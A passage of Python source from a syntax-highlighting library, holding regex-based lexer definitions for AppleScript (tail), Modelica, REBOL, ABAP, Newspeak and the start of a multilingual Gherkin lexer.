'title(d| (cell|font|height|position|rect))?', 'tool tip', 'toolbar', 'trailing offset', 'transparent', 'treat packages as directories', 'truncated labels', 'types', 'unmodified characters', 'update views', 'use sort indicator', 'user defaults', 'uses data source', 'uses ruler', 'uses threaded animation', 'uses title from previous column', 'value wraps', 'version', 'vertical( (line scroll|page scroll|ruler view))?', 'vertically resizable', 'view', 'visible( document rect)?', 'volume', 'width', 'window', 'windows menu', 'wraps', 'zoomable', 'zoomed'] tokens = { 'root': [ (r'\s+', Text), (r'¬\n', String.Escape), (r"'s\s+", Text), # This is a possessive, consider moving (r'(--|#).*?$', Comment), (r'\(\*', Comment.Multiline, 'comment'), (r'[\(\){}!,.:]', Punctuation), (r'(«)([^»]+)(»)', bygroups(Text, Name.Builtin, Text)), (r'\b((?:considering|ignoring)\s*)' r'(application responses|case|diacriticals|hyphens|' r'numeric strings|punctuation|white space)', bygroups(Keyword, Name.Builtin)), (r'(-|\*|\+|&|≠|>=?|<=?|=|≥|≤|/|÷|\^)', Operator), (r"\b(%s)\b" % '|'.join(Operators), Operator.Word), (r'^(\s*(?:on|end)\s+)' r'(%s)' % '|'.join(StudioEvents[::-1]), bygroups(Keyword, Name.Function)), (r'^(\s*)(in|on|script|to)(\s+)', bygroups(Text, Keyword, Text)), (r'\b(as )(%s)\b' % '|'.join(Classes), bygroups(Keyword, Name.Class)), (r'\b(%s)\b' % '|'.join(Literals), Name.Constant), (r'\b(%s)\b' % '|'.join(Commands), Name.Builtin), (r'\b(%s)\b' % '|'.join(Control), Keyword), (r'\b(%s)\b' % '|'.join(Declarations), Keyword), (r'\b(%s)\b' % '|'.join(Reserved), Name.Builtin), (r'\b(%s)s?\b' % '|'.join(BuiltIn), Name.Builtin), (r'\b(%s)\b' % '|'.join(HandlerParams), Name.Builtin), (r'\b(%s)\b' % '|'.join(StudioProperties), Name.Attribute), (r'\b(%s)s?\b' % '|'.join(StudioClasses), Name.Builtin), (r'\b(%s)\b' % '|'.join(StudioCommands), Name.Builtin), (r'\b(%s)\b' % '|'.join(References), Name.Builtin), (r'"(\\\\|\\"|[^"])*"', String.Double), (r'\b(%s)\b' % Identifiers, Name.Variable), (r'[-+]?(\d+\.\d*|\d*\.\d+)(E[-+][0-9]+)?', Number.Float), (r'[-+]?\d+', Number.Integer), ], 'comment': [ ('\(\*', Comment.Multiline, '#push'), ('\*\)', Comment.Multiline, '#pop'), ('[^*(]+', Comment.Multiline), ('[*(]', Comment.Multiline), ], } class ModelicaLexer(RegexLexer): """ For `Modelica <http://www.modelica.org/>`_ source code. *New in Pygments 1.1.* """ name = 'Modelica' aliases = ['modelica'] filenames = ['*.mo'] mimetypes = ['text/x-modelica'] flags = re.IGNORECASE | re.DOTALL tokens = { 'whitespace': [ (r'\n', Text), (r'\s+', Text), (r'\\\n', Text), # line continuation (r'//(\n|(.|\n)*?[^\\]\n)', Comment), (r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment), ], 'statements': [ (r'"', String, 'string'), (r'(\d+\.\d*|\.\d+|\d+|\d.)[eE][+-]?\d+[lL]?', Number.Float), (r'(\d+\.\d*|\.\d+)', Number.Float), (r'\d+[Ll]?', Number.Integer), (r'[~!%^&*+=|?:<>/-]', Operator), (r'[()\[\]{},.;]', Punctuation), (r'(true|false|NULL|Real|Integer|Boolean)\b', Name.Builtin), (r"([a-zA-Z_][\w]*|'[a-zA-Z_\+\-\*\/\^][\w]*')" r"(\.([a-zA-Z_][\w]*|'[a-zA-Z_\+\-\*\/\^][\w]*'))+", Name.Class), (r"('[\w\+\-\*\/\^]+'|\w+)", Name), ], 'root': [ include('whitespace'), include('keywords'), include('functions'), include('operators'), include('classes'), (r'("<html>|<html>)', Name.Tag, 'html-content'), include('statements'), ], 'keywords': [ (r'(algorithm|annotation|break|connect|constant|constrainedby|' r'discrete|each|else|elseif|elsewhen|encapsulated|enumeration|' r'end|equation|exit|expandable|extends|' r'external|false|final|flow|for|if|import|impure|in|initial\sequation|' r'inner|input|loop|nondiscrete|outer|output|parameter|partial|' r'protected|public|pure|redeclare|replaceable|stream|time|then|true|' r'when|while|within)\b', Keyword), ], 'functions': [ (r'(abs|acos|acosh|asin|asinh|atan|atan2|atan3|ceil|cos|cosh|' r'cross|div|exp|floor|getInstanceName|log|log10|mod|rem|' r'semiLinear|sign|sin|sinh|size|spatialDistribution|sqrt|tan|' r'tanh|zeros)\b', Name.Function), ], 'operators': [ (r'(actualStream|and|assert|cardinality|change|Clock|delay|der|edge|' r'hold|homotopy|initial|inStream|noEvent|not|or|pre|previous|reinit|' r'return|sample|smooth|spatialDistribution|subSample|terminal|' r'terminate)\b', Name.Builtin), ], 'classes': [ (r'(block|class|connector|function|model|package|' r'record|type)(\s+)([A-Za-z_]+)', bygroups(Keyword, Text, Name.Class)) ], 'string': [ (r'"', String, '#pop'), (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), (r'[^\\"\n]+', String), # all other characters (r'\\\n', String), # line continuation (r'\\', String), # stray backslash ], 'html-content': [ (r'<\s*/\s*html\s*>', Name.Tag, '#pop'), (r'.+?(?=<\s*/\s*html\s*>)', using(HtmlLexer)), ] } class RebolLexer(RegexLexer): """ A `REBOL <http://www.rebol.com/>`_ lexer. *New in Pygments 1.1.* """ name = 'REBOL' aliases = ['rebol'] filenames = ['*.r', '*.r3'] mimetypes = ['text/x-rebol'] flags = re.IGNORECASE | re.MULTILINE re.IGNORECASE escape_re = r'(?:\^\([0-9a-fA-F]{1,4}\)*)' def word_callback(lexer, match): word = match.group() if re.match(".*:$", word): yield match.start(), Generic.Subheading, word elif re.match( r'(native|alias|all|any|as-string|as-binary|bind|bound\?|case|' r'catch|checksum|comment|debase|dehex|exclude|difference|disarm|' r'either|else|enbase|foreach|remove-each|form|free|get|get-env|if|' r'in|intersect|loop|minimum-of|maximum-of|mold|new-line|' r'new-line\?|not|now|prin|print|reduce|compose|construct|repeat|' r'reverse|save|script\?|set|shift|switch|throw|to-hex|trace|try|' r'type\?|union|unique|unless|unprotect|unset|until|use|value\?|' r'while|compress|decompress|secure|open|close|read|read-io|' r'write-io|write|update|query|wait|input\?|exp|log-10|log-2|' r'log-e|square-root|cosine|sine|tangent|arccosine|arcsine|' r'arctangent|protect|lowercase|uppercase|entab|detab|connected\?|' r'browse|launch|stats|get-modes|set-modes|to-local-file|' r'to-rebol-file|encloak|decloak|create-link|do-browser|bind\?|' r'hide|draw|show|size-text|textinfo|offset-to-caret|' r'caret-to-offset|local-request-file|rgb-to-hsv|hsv-to-rgb|' r'crypt-strength\?|dh-make-key|dh-generate-key|dh-compute-key|' r'dsa-make-key|dsa-generate-key|dsa-make-signature|' r'dsa-verify-signature|rsa-make-key|rsa-generate-key|' r'rsa-encrypt)$', word): yield match.start(), Name.Builtin, word elif re.match( r'(add|subtract|multiply|divide|remainder|power|and~|or~|xor~|' r'minimum|maximum|negate|complement|absolute|random|head|tail|' r'next|back|skip|at|pick|first|second|third|fourth|fifth|sixth|' r'seventh|eighth|ninth|tenth|last|path|find|select|make|to|copy\*|' r'insert|remove|change|poke|clear|trim|sort|min|max|abs|cp|' r'copy)$', word): yield match.start(), Name.Function, word elif re.match( r'(error|source|input|license|help|install|echo|Usage|with|func|' r'throw-on-error|function|does|has|context|probe|\?\?|as-pair|' r'mod|modulo|round|repend|about|set-net|append|join|rejoin|reform|' r'remold|charset|array|replace|move|extract|forskip|forall|alter|' r'first+|also|take|for|forever|dispatch|attempt|what-dir|' r'change-dir|clean-path|list-dir|dirize|rename|split-path|delete|' r'make-dir|delete-dir|in-dir|confirm|dump-obj|upgrade|what|' r'build-tag|process-source|build-markup|decode-cgi|read-cgi|' r'write-user|save-user|set-user-name|protect-system|parse-xml|' r'cvs-date|cvs-version|do-boot|get-net-info|desktop|layout|' r'scroll-para|get-face|alert|set-face|uninstall|unfocus|' r'request-dir|center-face|do-events|net-error|decode-url|' r'parse-header|parse-header-date|parse-email-addrs|import-email|' r'send|build-attach-body|resend|show-popup|hide-popup|open-events|' r'find-key-face|do-face|viewtop|confine|find-window|' r'insert-event-func|remove-event-func|inform|dump-pane|dump-face|' r'flag-face|deflag-face|clear-fields|read-net|vbug|path-thru|' r'read-thru|load-thru|do-thru|launch-thru|load-image|' r'request-download|do-face-alt|set-font|set-para|get-style|' r'set-style|make-face|stylize|choose|hilight-text|hilight-all|' r'unlight-text|focus|scroll-drag|clear-face|reset-face|scroll-face|' r'resize-face|load-stock|load-stock-block|notify|request|flash|' r'request-color|request-pass|request-text|request-list|' r'request-date|request-file|dbug|editor|link-relative-path|' r'emailer|parse-error)$', word): yield match.start(), Keyword.Namespace, word elif re.match( r'(halt|quit|do|load|q|recycle|call|run|ask|parse|view|unview|' r'return|exit|break)$', word): yield match.start(), Name.Exception, word elif re.match('REBOL$', word): yield match.start(), Generic.Heading, word elif re.match("to-.*", word): yield match.start(), Keyword, word elif re.match('(\+|-|\*|/|//|\*\*|and|or|xor|=\?|=|==|<>|<|>|<=|>=)$', word): yield match.start(), Operator, word elif re.match(".*\?$", word): yield match.start(), Keyword, word elif re.match(".*\!$", word): yield match.start(), Keyword.Type, word elif re.match("'.*", word): yield match.start(), Name.Variable.Instance, word # lit-word elif re.match("#.*", word): yield match.start(), Name.Label, word # issue elif re.match("%.*", word): yield match.start(), Name.Decorator, word # file else: yield match.start(), Name.Variable, word tokens = { 'root': [ (r'REBOL', Generic.Strong, 'script'), (r'R', Comment), (r'[^R]+', Comment), ], 'script': [ (r'\s+', Text), (r'#"', String.Char, 'char'), (r'#{[0-9a-fA-F]*}', Number.Hex), (r'2#{', Number.Hex, 'bin2'), (r'64#{[0-9a-zA-Z+/=\s]*}', Number.Hex), (r'"', String, 'string'), (r'{', String, 'string2'), (r';#+.*\n', Comment.Special), (r';\*+.*\n', Comment.Preproc), (r';.*\n', Comment), (r'%"', Name.Decorator, 'stringFile'), (r'%[^(\^{^")\s\[\]]+', Name.Decorator), (r'[+-]?([a-zA-Z]{1,3})?\$\d+(\.\d+)?', Number.Float), # money (r'[+-]?\d+\:\d+(\:\d+)?(\.\d+)?', String.Other), # time (r'\d+\-[0-9a-zA-Z]+\-\d+(\/\d+\:\d+(\:\d+)?' r'([\.\d+]?([+-]?\d+:\d+)?)?)?', String.Other), # date (r'\d+(\.\d+)+\.\d+', Keyword.Constant), # tuple (r'\d+[xX]\d+', Keyword.Constant), # pair (r'[+-]?\d+(\'\d+)?([\.,]\d*)?[eE][+-]?\d+', Number.Float), (r'[+-]?\d+(\'\d+)?[\.,]\d*', Number.Float), (r'[+-]?\d+(\'\d+)?', Number), (r'[\[\]\(\)]', Generic.Strong), (r'[a-zA-Z]+[^(\^{"\s:)]*://[^(\^{"\s)]*', Name.Decorator), # url (r'mailto:[^(\^{"@\s)]+@[^(\^{"@\s)]+', Name.Decorator), # url (r'[^(\^{"@\s)]+@[^(\^{"@\s)]+', Name.Decorator), # email (r'comment\s', Comment, 'comment'), (r'/[^(\^{^")\s/[\]]*', Name.Attribute), (r'([^(\^{^")\s/[\]]+)(?=[:({"\s/\[\]])', word_callback), (r'<[a-zA-Z0-9:._-]*>', Name.Tag), (r'<[^(<>\s")]+', Name.Tag, 'tag'), (r'([^(\^{^")\s]+)', Text), ], 'string': [ (r'[^(\^")]+', String), (escape_re, String.Escape), (r'[\(|\)]+', String), (r'\^.', String.Escape), (r'"', String, '#pop'), ], 'string2': [ (r'[^(\^{^})]+', String), (escape_re, String.Escape), (r'[\(|\)]+', String), (r'\^.', String.Escape), (r'{', String, '#push'), (r'}', String, '#pop'), ], 'stringFile': [ (r'[^(\^")]+', Name.Decorator), (escape_re, Name.Decorator), (r'\^.', Name.Decorator), (r'"', Name.Decorator, '#pop'), ], 'char': [ (escape_re + '"', String.Char, '#pop'), (r'\^."', String.Char, '#pop'), (r'."', String.Char, '#pop'), ], 'tag': [ (escape_re, Name.Tag), (r'"', Name.Tag, 'tagString'), (r'[^(<>\r\n")]+', Name.Tag), (r'>', Name.Tag, '#pop'), ], 'tagString': [ (r'[^(\^")]+', Name.Tag), (escape_re, Name.Tag), (r'[\(|\)]+', Name.Tag), (r'\^.', Name.Tag), (r'"', Name.Tag, '#pop'), ], 'tuple': [ (r'(\d+\.)+', Keyword.Constant), (r'\d+', Keyword.Constant, '#pop'), ], 'bin2': [ (r'\s+', Number.Hex), (r'([0-1]\s*){8}', Number.Hex), (r'}', Number.Hex, '#pop'), ], 'comment': [ (r'"', Comment, 'commentString1'), (r'{', Comment, 'commentString2'), (r'\[', Comment, 'commentBlock'), (r'[^(\s{\"\[]+', Comment, '#pop'), ], 'commentString1': [ (r'[^(\^")]+', Comment), (escape_re, Comment), (r'[\(|\)]+', Comment), (r'\^.', Comment), (r'"', Comment, '#pop'), ], 'commentString2': [ (r'[^(\^{^})]+', Comment), (escape_re, Comment), (r'[\(|\)]+', Comment), (r'\^.', Comment), (r'{', Comment, '#push'), (r'}', Comment, '#pop'), ], 'commentBlock': [ (r'\[', Comment, '#push'), (r'\]', Comment, '#pop'), (r'[^(\[\])]+', Comment), ], } class ABAPLexer(RegexLexer): """ Lexer for ABAP, SAP's integrated language. *New in Pygments 1.1.* """ name = 'ABAP' aliases = ['abap'] filenames = ['*.abap'] mimetypes = ['text/x-abap'] flags = re.IGNORECASE | re.MULTILINE tokens = { 'common': [ (r'\s+', Text), (r'^\*.*$', Comment.Single), (r'\".*?\n', Comment.Single), ], 'variable-names': [ (r'<[\S_]+>', Name.Variable), (r'\w[\w~]*(?:(\[\])|->\*)?', Name.Variable), ], 'root': [ include('common'), #function calls (r'(CALL\s+(?:BADI|CUSTOMER-FUNCTION|FUNCTION))(\s+)(\'?\S+\'?)', bygroups(Keyword, Text, Name.Function)), (r'(CALL\s+(?:DIALOG|SCREEN|SUBSCREEN|SELECTION-SCREEN|' r'TRANSACTION|TRANSFORMATION))\b', Keyword), (r'(FORM|PERFORM)(\s+)(\w+)', bygroups(Keyword, Text, Name.Function)), (r'(PERFORM)(\s+)(\()(\w+)(\))', bygroups(Keyword, Text, Punctuation, Name.Variable, Punctuation )), (r'(MODULE)(\s+)(\S+)(\s+)(INPUT|OUTPUT)', bygroups(Keyword, Text, Name.Function, Text, Keyword)), # method implementation (r'(METHOD)(\s+)([\w~]+)', bygroups(Keyword, Text, Name.Function)), # method calls (r'(\s+)([\w\-]+)([=\-]>)([\w\-~]+)', bygroups(Text, Name.Variable, Operator, Name.Function)), # call methodnames returning style (r'(?<=(=|-)>)([\w\-~]+)(?=\()', Name.Function), # keywords with dashes in them. # these need to be first, because for instance the -ID part # of MESSAGE-ID wouldn't get highlighted if MESSAGE was # first in the list of keywords. (r'(ADD-CORRESPONDING|AUTHORITY-CHECK|' r'CLASS-DATA|CLASS-EVENTS|CLASS-METHODS|CLASS-POOL|' r'DELETE-ADJACENT|DIVIDE-CORRESPONDING|' r'EDITOR-CALL|ENHANCEMENT-POINT|ENHANCEMENT-SECTION|EXIT-COMMAND|' r'FIELD-GROUPS|FIELD-SYMBOLS|FUNCTION-POOL|' r'INTERFACE-POOL|INVERTED-DATE|' r'LOAD-OF-PROGRAM|LOG-POINT|' r'MESSAGE-ID|MOVE-CORRESPONDING|MULTIPLY-CORRESPONDING|' r'NEW-LINE|NEW-PAGE|NEW-SECTION|NO-EXTENSION|' r'OUTPUT-LENGTH|PRINT-CONTROL|' r'SELECT-OPTIONS|START-OF-SELECTION|SUBTRACT-CORRESPONDING|' r'SYNTAX-CHECK|SYSTEM-EXCEPTIONS|' r'TYPE-POOL|TYPE-POOLS' r')\b', Keyword), # keyword kombinations (r'CREATE\s+(PUBLIC|PRIVATE|DATA|OBJECT)|' r'((PUBLIC|PRIVATE|PROTECTED)\s+SECTION|' r'(TYPE|LIKE)(\s+(LINE\s+OF|REF\s+TO|' r'(SORTED|STANDARD|HASHED)\s+TABLE\s+OF))?|' r'FROM\s+(DATABASE|MEMORY)|CALL\s+METHOD|' r'(GROUP|ORDER) BY|HAVING|SEPARATED BY|' r'GET\s+(BADI|BIT|CURSOR|DATASET|LOCALE|PARAMETER|' r'PF-STATUS|(PROPERTY|REFERENCE)\s+OF|' r'RUN\s+TIME|TIME\s+(STAMP)?)?|' r'SET\s+(BIT|BLANK\s+LINES|COUNTRY|CURSOR|DATASET|EXTENDED\s+CHECK|' r'HANDLER|HOLD\s+DATA|LANGUAGE|LEFT\s+SCROLL-BOUNDARY|' r'LOCALE|MARGIN|PARAMETER|PF-STATUS|PROPERTY\s+OF|' r'RUN\s+TIME\s+(ANALYZER|CLOCK\s+RESOLUTION)|SCREEN|' r'TITLEBAR|UPADTE\s+TASK\s+LOCAL|USER-COMMAND)|' r'CONVERT\s+((INVERTED-)?DATE|TIME|TIME\s+STAMP|TEXT)|' r'(CLOSE|OPEN)\s+(DATASET|CURSOR)|' r'(TO|FROM)\s+(DATA BUFFER|INTERNAL TABLE|MEMORY ID|' r'DATABASE|SHARED\s+(MEMORY|BUFFER))|' r'DESCRIBE\s+(DISTANCE\s+BETWEEN|FIELD|LIST|TABLE)|' r'FREE\s(MEMORY|OBJECT)?|' r'PROCESS\s+(BEFORE\s+OUTPUT|AFTER\s+INPUT|' r'ON\s+(VALUE-REQUEST|HELP-REQUEST))|' r'AT\s+(LINE-SELECTION|USER-COMMAND|END\s+OF|NEW)|' r'AT\s+SELECTION-SCREEN(\s+(ON(\s+(BLOCK|(HELP|VALUE)-REQUEST\s+FOR|' r'END\s+OF|RADIOBUTTON\s+GROUP))?|OUTPUT))?|' r'SELECTION-SCREEN:?\s+((BEGIN|END)\s+OF\s+((TABBED\s+)?BLOCK|LINE|' r'SCREEN)|COMMENT|FUNCTION\s+KEY|' r'INCLUDE\s+BLOCKS|POSITION|PUSHBUTTON|' r'SKIP|ULINE)|' r'LEAVE\s+(LIST-PROCESSING|PROGRAM|SCREEN|' r'TO LIST-PROCESSING|TO TRANSACTION)' r'(ENDING|STARTING)\s+AT|' r'FORMAT\s+(COLOR|INTENSIFIED|INVERSE|HOTSPOT|INPUT|FRAMES|RESET)|' r'AS\s+(CHECKBOX|SUBSCREEN|WINDOW)|' r'WITH\s+(((NON-)?UNIQUE)?\s+KEY|FRAME)|' r'(BEGIN|END)\s+OF|' r'DELETE(\s+ADJACENT\s+DUPLICATES\sFROM)?|' r'COMPARING(\s+ALL\s+FIELDS)?|' r'INSERT(\s+INITIAL\s+LINE\s+INTO|\s+LINES\s+OF)?|' r'IN\s+((BYTE|CHARACTER)\s+MODE|PROGRAM)|' r'END-OF-(DEFINITION|PAGE|SELECTION)|' r'WITH\s+FRAME(\s+TITLE)|' # simple kombinations r'AND\s+(MARK|RETURN)|CLIENT\s+SPECIFIED|CORRESPONDING\s+FIELDS\s+OF|' r'IF\s+FOUND|FOR\s+EVENT|INHERITING\s+FROM|LEAVE\s+TO\s+SCREEN|' r'LOOP\s+AT\s+(SCREEN)?|LOWER\s+CASE|MATCHCODE\s+OBJECT|MODIF\s+ID|' r'MODIFY\s+SCREEN|NESTING\s+LEVEL|NO\s+INTERVALS|OF\s+STRUCTURE|' r'RADIOBUTTON\s+GROUP|RANGE\s+OF|REF\s+TO|SUPPRESS DIALOG|' r'TABLE\s+OF|UPPER\s+CASE|TRANSPORTING\s+NO\s+FIELDS|' r'VALUE\s+CHECK|VISIBLE\s+LENGTH|HEADER\s+LINE)\b', Keyword), # single word keywords. (r'(^|(?<=(\s|\.)))(ABBREVIATED|ADD|ALIASES|APPEND|ASSERT|' r'ASSIGN(ING)?|AT(\s+FIRST)?|' r'BACK|BLOCK|BREAK-POINT|' r'CASE|CATCH|CHANGING|CHECK|CLASS|CLEAR|COLLECT|COLOR|COMMIT|' r'CREATE|COMMUNICATION|COMPONENTS?|COMPUTE|CONCATENATE|CONDENSE|' r'CONSTANTS|CONTEXTS|CONTINUE|CONTROLS|' r'DATA|DECIMALS|DEFAULT|DEFINE|DEFINITION|DEFERRED|DEMAND|' r'DETAIL|DIRECTORY|DIVIDE|DO|' r'ELSE(IF)?|ENDAT|ENDCASE|ENDCLASS|ENDDO|ENDFORM|ENDFUNCTION|' r'ENDIF|ENDLOOP|ENDMETHOD|ENDMODULE|ENDSELECT|ENDTRY|' r'ENHANCEMENT|EVENTS|EXCEPTIONS|EXIT|EXPORT|EXPORTING|EXTRACT|' r'FETCH|FIELDS?|FIND|FOR|FORM|FORMAT|FREE|FROM|' r'HIDE|' r'ID|IF|IMPORT|IMPLEMENTATION|IMPORTING|IN|INCLUDE|INCLUDING|' r'INDEX|INFOTYPES|INITIALIZATION|INTERFACE|INTERFACES|INTO|' r'LENGTH|LINES|LOAD|LOCAL|' r'JOIN|' r'KEY|' r'MAXIMUM|MESSAGE|METHOD[S]?|MINIMUM|MODULE|MODIFY|MOVE|MULTIPLY|' r'NODES|' r'OBLIGATORY|OF|OFF|ON|OVERLAY|' r'PACK|PARAMETERS|PERCENTAGE|POSITION|PROGRAM|PROVIDE|PUBLIC|PUT|' r'RAISE|RAISING|RANGES|READ|RECEIVE|REFRESH|REJECT|REPORT|RESERVE|' r'RESUME|RETRY|RETURN|RETURNING|RIGHT|ROLLBACK|' r'SCROLL|SEARCH|SELECT|SHIFT|SINGLE|SKIP|SORT|SPLIT|STATICS|STOP|' r'SUBMIT|SUBTRACT|SUM|SUMMARY|SUMMING|SUPPLY|' r'TABLE|TABLES|TIMES|TITLE|TO|TOP-OF-PAGE|TRANSFER|TRANSLATE|TRY|TYPES|' r'ULINE|UNDER|UNPACK|UPDATE|USING|' r'VALUE|VALUES|VIA|' r'WAIT|WHEN|WHERE|WHILE|WITH|WINDOW|WRITE)\b', Keyword), # builtins (r'(abs|acos|asin|atan|' r'boolc|boolx|bit_set|' r'char_off|charlen|ceil|cmax|cmin|condense|contains|' r'contains_any_of|contains_any_not_of|concat_lines_of|cos|cosh|' r'count|count_any_of|count_any_not_of|' r'dbmaxlen|distance|' r'escape|exp|' r'find|find_end|find_any_of|find_any_not_of|floor|frac|from_mixed|' r'insert|' r'lines|log|log10|' r'match|matches|' r'nmax|nmin|numofchar|' r'repeat|replace|rescale|reverse|round|' r'segment|shift_left|shift_right|sign|sin|sinh|sqrt|strlen|' r'substring|substring_after|substring_from|substring_before|substring_to|' r'tan|tanh|to_upper|to_lower|to_mixed|translate|trunc|' r'xstrlen)(\()\b', bygroups(Name.Builtin, Punctuation)), (r'&[0-9]', Name), (r'[0-9]+', Number.Integer), # operators which look like variable names before # parsing variable names. (r'(?<=(\s|.))(AND|EQ|NE|GT|LT|GE|LE|CO|CN|CA|NA|CS|NOT|NS|CP|NP|' r'BYTE-CO|BYTE-CN|BYTE-CA|BYTE-NA|BYTE-CS|BYTE-NS|' r'IS\s+(NOT\s+)?(INITIAL|ASSIGNED|REQUESTED|BOUND))\b', Operator), include('variable-names'), # standard oparators after variable names, # because < and > are part of field symbols. (r'[?*<>=\-+]', Operator), (r"'(''|[^'])*'", String.Single), (r'[/;:()\[\],\.]', Punctuation) ], } class NewspeakLexer(RegexLexer): """ For `Newspeak <http://newspeaklanguage.org/>` syntax. """ name = 'Newspeak' filenames = ['*.ns2'] aliases = ['newspeak', ] mimetypes = ['text/x-newspeak'] tokens = { 'root' : [ (r'\b(Newsqueak2)\b',Keyword.Declaration), (r"'[^']*'",String), (r'\b(class)(\s+)([a-zA-Z0-9_]+)(\s*)', bygroups(Keyword.Declaration,Text,Name.Class,Text)), (r'\b(mixin|self|super|private|public|protected|nil|true|false)\b', Keyword), (r'([a-zA-Z0-9_]+\:)(\s*)([a-zA-Z_]\w+)', bygroups(Name.Function,Text,Name.Variable)), (r'([a-zA-Z0-9_]+)(\s*)(=)', bygroups(Name.Attribute,Text,Operator)), (r'<[a-zA-Z0-9_]+>', Comment.Special), include('expressionstat'), include('whitespace') ], 'expressionstat': [ (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float), (r'\d+', Number.Integer), (r':\w+',Name.Variable), (r'(\w+)(::)', bygroups(Name.Variable, Operator)), (r'\w+:', Name.Function), (r'\w+', Name.Variable), (r'\(|\)', Punctuation), (r'\[|\]', Punctuation), (r'\{|\}', Punctuation), (r'(\^|\+|\/|~|\*|<|>|=|@|%|\||&|\?|!|,|-|:)', Operator), (r'\.|;', Punctuation), include('whitespace'), include('literals'), ], 'literals': [ (r'\$.', String), (r"'[^']*'", String), (r"#'[^']*'", String.Symbol), (r"#\w+:?", String.Symbol), (r"#(\+|\/|~|\*|<|>|=|@|%|\||&|\?|!|,|-)+", String.Symbol) ], 'whitespace' : [ (r'\s+', Text), (r'"[^"]*"', Comment) ] } class GherkinLexer(RegexLexer): """ For `Gherkin <http://github.com/aslakhellesoy/gherkin/>` syntax. *New in Pygments 1.2.* """ name = 'Gherkin' aliases = ['Cucumber', 'cucumber', 'Gherkin', 'gherkin'] filenames = ['*.feature'] mimetypes = ['text/x-gherkin'] feature_keywords = r'^(기능|機能|功能|フィーチャ|خاصية|תכונה|Функціонал|Функционалност|Функционал|Фича|Особина|Могућност|Özellik|Właściwość|Tính năng|Trajto|Savybė|Požiadavka|Požadavek|Osobina|Ominaisuus|Omadus|OH HAI|Mogućnost|Mogucnost|Jellemző|Fīča|Funzionalità|Funktionalität|Funkcionalnost|Funkcionalitāte|Funcționalitate|Functionaliteit|Functionalitate|Funcionalitat|Funcionalidade|Fonctionnalité|Fitur|Feature|Egenskap|Egenskab|Crikey|Característica|Arwedd)(:)(.*)$' feature_element_keywords = r'^(\s*)(시나리오 개요|시나리오|배경|背景|場景大綱|場景|场景大纲|场景|劇本大綱|劇本|テンプレ|シナリオテンプレート|シナリオテンプレ|シナリオアウトライン|シナリオ|سيناريو مخطط|سيناريو|الخلفية|תרחיש|תבנית תרחיש|רקע|Тарих|Сценарій|Сценарио|Сценарий структураси|Сценарий|Структура сценарію|Структура сценарија|Структура сценария|Скица|Рамка на сценарий|Пример|Предыстория|Предистория|Позадина|Передумова|Основа|Концепт|Контекст|Założenia|Wharrimean is|Tình huống|The thing of it is|Tausta|Taust|Tapausaihio|Tapaus|Szenariogrundriss|Szenario|Szablon scenariusza|Stsenaarium|Struktura scenarija|Skica|Skenario konsep|Skenario|Situācija|Senaryo taslağı|Senaryo|Scénář|Scénario|Schema dello scenario|Scenārijs pēc parauga|Scenārijs|Scenár|Scenaro|Scenariusz|Scenariul de şablon|Scenariul de sablon|Scenariu|Scenario Outline|Scenario Amlinellol|Scenario|Scenarijus|Scenarijaus šablonas|Scenarij|Scenarie|Rerefons|Raamstsenaarium|Primer|Pozadí|Pozadina|Pozadie|Plan du scénario|Plan du Scénario|Osnova scénáře|Osnova|Náčrt Scénáře|Náčrt Scenáru|Mate|MISHUN SRSLY|MISHUN|Kịch bản|Konturo de la scenaro|Kontext|Konteksts|Kontekstas|Kontekst|Koncept|Khung tình huống|Khung kịch bản|Háttér|Grundlage|Geçmiş|Forgatókönyv vázlat|Forgatókönyv|Fono|Esquema do Cenário|Esquema do Cenario|Esquema del escenario|Esquema de l\'escenari|Escenario|Escenari|Dis is what went down|Dasar|Contexto|Contexte|Contesto|Condiţii|Conditii|Cenário|Cenario|Cefndir|Bối cảnh|Blokes|Bakgrunn|Bakgrund|Baggrund|Background|B4|Antecedents|Antecedentes|All y\'all|Achtergrond|Abstrakt Scenario|Abstract Scenario)(:)(.*)$' examples_keywords = r'^(\s*)(예|例子|例|サンプル|امثلة|דוגמאות|Сценарији|Примери|Приклади|Мисоллар|Значения|Örnekler|Voorbeelden|Variantai|Tapaukset|Scenarios|Scenariji|Scenarijai|Příklady|Példák|Príklady|Przykłady|Primjeri|Primeri|Piemēri|Pavyzdžiai|Paraugs|Juhtumid|Exemplos|Exemples|Exemplele|Exempel|Examples|Esempi|Enghreifftiau|Ekzemploj|Eksempler|Ejemplos|EXAMPLZ|Dữ liệu|Contoh|Cobber|Beispiele)(:)(.*)$' step_keywords = r'^(\s*)(하지만|조건|먼저|만일|만약|단|그리고|그러면|那麼|那么|而且|當|当|前提|假設|假如|但是|但し|並且|もし|ならば|ただし|しかし|かつ|و |متى |لكن |عندما |ثم |بفرض |اذاً |כאשר |וגם |בהינתן |אזי |אז |אבל |Якщо |Унда |То |Припустимо, що |Припустимо |Онда |Но |Нехай |Лекин |Когато |Када |Кад |К тому же |И |Задато |Задати |Задате |Если |Допустим |Дадено |Ва |Бирок |Аммо |Али |Але |Агар |А |І |Și |És |Zatati |Zakładając |Zadato |Zadate |Zadano |Zadani |Zadan |Youse know when youse got |Youse know like when |Yna |Ya know how |Ya gotta |Y |Wun |Wtedy |When y\'all |When |Wenn |WEN |Và |Ve |Und |Un |Thì |Then y\'all |Then |Tapi |Tak |Tada |Tad |Så |Stel |Soit |Siis |Si |Sed |Se |Quando |Quand |Quan |Pryd |Pokud |Pokiaľ |Però |Pero |Pak |Oraz |Onda |Ond |Oletetaan |Og |Och |O zaman |Når |När |Niin |Nhưng |N |Mutta |Men |Mas |Maka |Majd |Mais |Maar |Ma |Lorsque |Lorsqu\'|Kun |Kuid |Kui |Khi |Keď |Ketika |Když |Kaj |Kai |Kada |Kad |Jeżeli |Ja |Ir |I CAN HAZ |I |Ha |Givun |Givet |Given y\'all |Given |Gitt |Gegeven |Gegeben sei |Fakat |Eğer ki |Etant donné |Et |Então |Entonces |Entao |En |Eeldades |E |Duota |Dun |Donitaĵo |Donat |Donada |Do |Diyelim ki |Dengan |Den youse gotta |De |Dato |Dar |Dann |Dan |Dado |Dacă |Daca |DEN |Când |Cuando |Cho |Cept |Cand |Cal |But y\'all |But |Buh |Biết |Bet |BUT |Atès |Atunci |Atesa |Anrhegedig a |Angenommen |And y\'all |And |An |Ama |Als |Alors |Allora |Ali |Aleshores |Ale |Akkor |Aber |AN |A také |A |\* )' tokens = { 'comments': [ 